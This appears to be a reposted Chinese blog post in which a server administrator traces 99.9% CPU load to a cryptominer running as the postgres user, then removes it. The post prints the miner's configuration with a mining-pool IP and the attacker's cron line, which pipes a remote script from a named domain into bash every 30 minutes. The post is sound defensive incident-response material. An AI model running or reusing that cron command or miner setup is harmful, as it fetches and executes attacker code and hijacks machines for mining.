cpu占用99.9%

这两天发现服务器上cpu一直是满负荷，查看了一下top发现是postgres的[ddns]占满了，网上搜了一下postgres的cpu占用问题，都说是sql查询的问题，可我sql都停了，没有查询，cpu还是占用接近99.9%，搜索ddns看看是什么也没查出来为什么cpu占用这么高。
切换postgres用户ps -ux查看该命令 ./[ddns] –config=./[ddns].pid
在这里插入图片描述
查了一下发现有个目录，里面有这个文件，（这时我还没发现是被攻击）


<span class="token function">find</span> / -name *ddns* 
<span class="token function">find</span> / -name *ddns* 
find / -name *ddns*

在这里插入图片描述

[ddns].pid.bak里面有个ip 194.147.114.20:45543


<span class="token punctuation">{<!-- --></span> <span class="token string">"autosave"</span><span class="token builtin class-name">:</span> true, <span class="token string">"background"</span><span class="token builtin class-name">:</span> true, <span class="token string">"cpu"</span><span class="token builtin class-name">:</span> <span class="token punctuation">{<!-- --></span> <span class="token string">"enabled"</span><span class="token builtin class-name">:</span> true, <span class="token string">"huge-pages"</span><span class="token builtin class-name">:</span> true, <span class="token string">"huge-pages-jit"</span><span class="token builtin class-name">:</span> false, <span class="token string">"hw-aes"</span><span class="token builtin class-name">:</span> null, <span class="token string">"priority"</span><span class="token builtin class-name">:</span> null, <span class="token string">"memory-pool"</span><span class="token builtin class-name">:</span> false, <span class="token string">"yield"</span><span class="token builtin class-name">:</span> true, <span class="token string">"max-threads-hint"</span><span class="token builtin class-name">:</span> <span class="token number">70</span>, <span class="token string">"asm"</span><span class="token builtin class-name">:</span> true, <span class="token string">"argon2-impl"</span><span class="token builtin class-name">:</span> null, <span class="token string">"astrobwt-max-size"</span><span class="token builtin class-name">:</span> <span class="token number">550</span>, <span class="token string">"astrobwt-avx2"</span><span class="token builtin class-name">:</span> false, <span class="token string">"cn/0"</span><span class="token builtin class-name">:</span> false, <span class="token string">"cn-lite/0"</span><span class="token builtin class-name">:</span> <span class="token boolean">false</span> <span class="token punctuation">}</span>, <span class="token string">"log-file"</span><span class="token builtin class-name">:</span><span class="token string">"/var/tmp/.../.ddns.log"</span>, <span class="token string">"opencl"</span><span class="token builtin class-name">:</span> false, <span class="token string">"cuda"</span><span class="token builtin class-name">:</span> false, <span class="token string">"pools"</span><span class="token builtin class-name">:</span> <span class="token punctuation">[</span> <span class="token punctuation">{<!-- --></span> <span class="token string">"url"</span><span class="token builtin class-name">:</span> <span class="token string">"194.147.114.20:45543"</span> <span class="token punctuation">}</span> <span class="token punctuation">]</span> <span class="token punctuation">}</span> 
<span class="token punctuation">{<!-- --></span> <span class="token string">"autosave"</span><span class="token builtin class-name">:</span> true, <span class="token string">"background"</span><span class="token builtin class-name">:</span> true, <span class="token string">"cpu"</span><span class="token builtin class-name">:</span> <span class="token punctuation">{<!-- --></span> <span class="token string">"enabled"</span><span class="token builtin class-name">:</span> true, <span class="token string">"huge-pages"</span><span class="token builtin class-name">:</span> true, <span class="token string">"huge-pages-jit"</span><span class="token builtin class-name">:</span> false, <span class="token string">"hw-aes"</span><span class="token builtin class-name">:</span> null, <span class="token string">"priority"</span><span class="token builtin class-name">:</span> null, <span class="token string">"memory-pool"</span><span class="token builtin class-name">:</span> false, <span class="token string">"yield"</span><span class="token builtin class-name">:</span> true, <span class="token string">"max-threads-hint"</span><span class="token builtin class-name">:</span> <span class="token number">70</span>, <span class="token string">"asm"</span><span class="token builtin class-name">:</span> true, <span class="token string">"argon2-impl"</span><span class="token builtin class-name">:</span> null, <span class="token string">"astrobwt-max-size"</span><span class="token builtin class-name">:</span> <span class="token number">550</span>, <span class="token string">"astrobwt-avx2"</span><span class="token builtin class-name">:</span> false, <span class="token string">"cn/0"</span><span class="token builtin class-name">:</span> false, <span class="token string">"cn-lite/0"</span><span class="token builtin class-name">:</span> <span class="token boolean">false</span> <span class="token punctuation">}</span>, <span class="token string">"log-file"</span><span class="token builtin class-name">:</span><span class="token string">"/var/tmp/.../.ddns.log"</span>, <span class="token string">"opencl"</span><span class="token builtin class-name">:</span> false, <span class="token string">"cuda"</span><span class="token builtin class-name">:</span> false, <span class="token string">"pools"</span><span class="token builtin class-name">:</span> <span class="token punctuation">[</span> <span class="token punctuation">{<!-- --></span> <span class="token string">"url"</span><span class="token builtin class-name">:</span> <span class="token string">"194.147.114.20:45543"</span> <span class="token punctuation">}</span> <span class="token punctuation">]</span> <span class="token punctuation">}</span> 
{ "autosave": true, "background": true, "cpu": { "enabled": true, "huge-pages": true, "huge-pages-jit": false, "hw-aes": null, "priority": null, "memory-pool": false, "yield": true, "max-threads-hint": 70, "asm": true, "argon2-impl": null, "astrobwt-max-size": 550, "astrobwt-avx2": false, "cn/0": false, "cn-lite/0": false }, "log-file":"/var/tmp/.../.ddns.log", "opencl": false, "cuda": false, "pools": [ { "url": "194.147.114.20:45543" } ] }

在网上用ip解析发现是瑞士
在这里插入图片描述
看了一下往这个/var/tmp/…/.ddns.log 日志文件写了什么，意识到有可能被攻击了，网上查了一下，确定了是被攻击了

.ddns.log
在postgres用户下的crontab -l发现有个定时任务，定时获取一个a.sh
这样的话，就算kill -9 也没有用，它会定时恢复


<span class="token operator">*</span><span class="token operator">/</span><span class="token number">30</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">/</span>bin<span class="token operator">/</span>curl <span class="token operator">-</span>fsSL http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span>crypto<span class="token punctuation">.</span>htxreceive<span class="token punctuation">.</span>top<span class="token operator">/</span>s3f815<span class="token operator">/</span>a<span class="token operator">/</span>a<span class="token punctuation">.</span>sh <span class="token operator">|</span> bash <span class="token operator">></span> <span class="token operator">/</span>dev<span class="token operator">/</span><span class="token keyword">null</span> <span class="token number">2</span><span class="token operator">></span><span class="token operator">&</span><span class="token number">1</span> 
<span class="token operator">*</span><span class="token operator">/</span><span class="token number">30</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">/</span>bin<span class="token operator">/</span>curl <span class="token operator">-</span>fsSL http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span>crypto<span class="token punctuation">.</span>htxreceive<span class="token punctuation">.</span>top<span class="token operator">/</span>s3f815<span class="token operator">/</span>a<span class="token operator">/</span>a<span class="token punctuation">.</span>sh <span class="token operator">|</span> bash <span class="token operator">></span> <span class="token operator">/</span>dev<span class="token operator">/</span><span class="token keyword">null</span> <span class="token number">2</span><span class="token operator">></span><span class="token operator">&</span><span class="token number">1</span> 
*/30 * * * * /bin/curl -fsSL http://crypto.htxreceive.top/s3f815/a/a.sh | bash > /dev/null 2>&1

删除该用户下的crontab，如果你有其他的定时任务，用crontab -e 编辑


<span class="token function">crontab</span> -r 
<span class="token function">crontab</span> -r 
crontab -r

然后把/var/tmp/.crypto这个目录给删了，在kill掉哪个进程就可以了

查询authorized_keys是不是有自动登录的密钥
有的话删除掉这个用户还有这个文件


<span class="token function">find</span> / -name authorized_keys 
<span class="token function">find</span> / -name authorized_keys 
find / -name authorized_keys

大致原因我怀疑是我的postgres密码比较简单，因为它是在postgres用户下创建的

更详细的可以查看这位老哥的帖子
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)

原文链接：https://blog.csdn.net/weixin_43085094/article/details/122064395?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168466843816800211583225%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=168466843816800211583225&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-9-122064395-null-null.blog_rank_default&utm_term=NAS%E3%80%81%E7%BE%A4%E6%99%96%E3%80%81%E9%98%BF%E9%87%8C%E4%BA%91%E3%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90%E3%80%81%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E3%80%81ipv6%E3%80%81ddns%E3%80%81%E8%BD%BB%E9%87%8F%E7%BA%A7%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E9%93%81%E5%A8%81%E9%A9%AC%E3%80%81%E5%A8%81%E8%81%94%E9%80%9A%E3%80%81DSM%E3%80%81DSM6.0%E3%80%81%E7%BE%A4%E6%99%96nas%E3%80%81%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E8%9C%97%E7%89%9B%E6%98%9F%E9%99%85%E3%80%81%E9%BB%91%E7%BE%A4%E6%99%96%E3%80%81docker%E3%80%81%E5%AE%B9%E5%99%A8%E9%95%9C%E5%83%8F%E3%80%81%E5%9F%9F%E5%90%8D%E6%B3%A8%E5%86%8C%E3%80%81%E5%AE%9D%E5%A1%94%E3%80%81%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E3%80%81nginx%E3%80%81frp%E3%80%81%E5%8A%A8%E6%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90

声明📢本站内容均来自互联网，归原创作者所有，如有侵权必删除。本站文章皆由CC-4.0协议发布，如无来源则为原创，转载请注明出处。

THE END